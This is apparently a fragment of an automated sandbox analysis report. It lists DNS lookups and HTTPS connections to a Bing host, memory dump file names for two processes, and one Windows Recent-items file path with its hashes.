US 8.8.8.8:53 50.170.16.2.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 151.247.89.45.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/948-0-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-6-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-5-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-4-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-7-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-9-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-10-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-8-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-12-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-11-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-13-0x00007FFE7C2C0000-0x00007FFE7C2D0000-memory.dmp

memory/948-3-0x00007FFEBEBAD000-0x00007FFEBEBAE000-memory.dmp

memory/948-14-0x00007FFE7C2C0000-0x00007FFE7C2D0000-memory.dmp

memory/948-2-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-1-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/3192-36-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/3192-37-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/3192-39-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-42-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/3192-46-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/3192-47-0x00007FF62D9C0000-0x00007FF62D9C8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 135acfab77825c317285aba38ea0d7a1
SHA1 44ef8388b93aacf814e8510475be5fa9dbb937fd
SHA256 1043e62d3ffc656abe791ae8b0044acd96e1ee96a2eb1ba5d710978596260145
SHA512 0bb1f91211059a5f4765809499f82cad46125b9e6c3ed6a6932d5f76e5d5564fdcd359b18b93154cb77bc7fcaee148ce5da3b7489a1688a5a4e68c6ab921ba30

memory/948-80-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-81-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-82-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-79-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-83-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp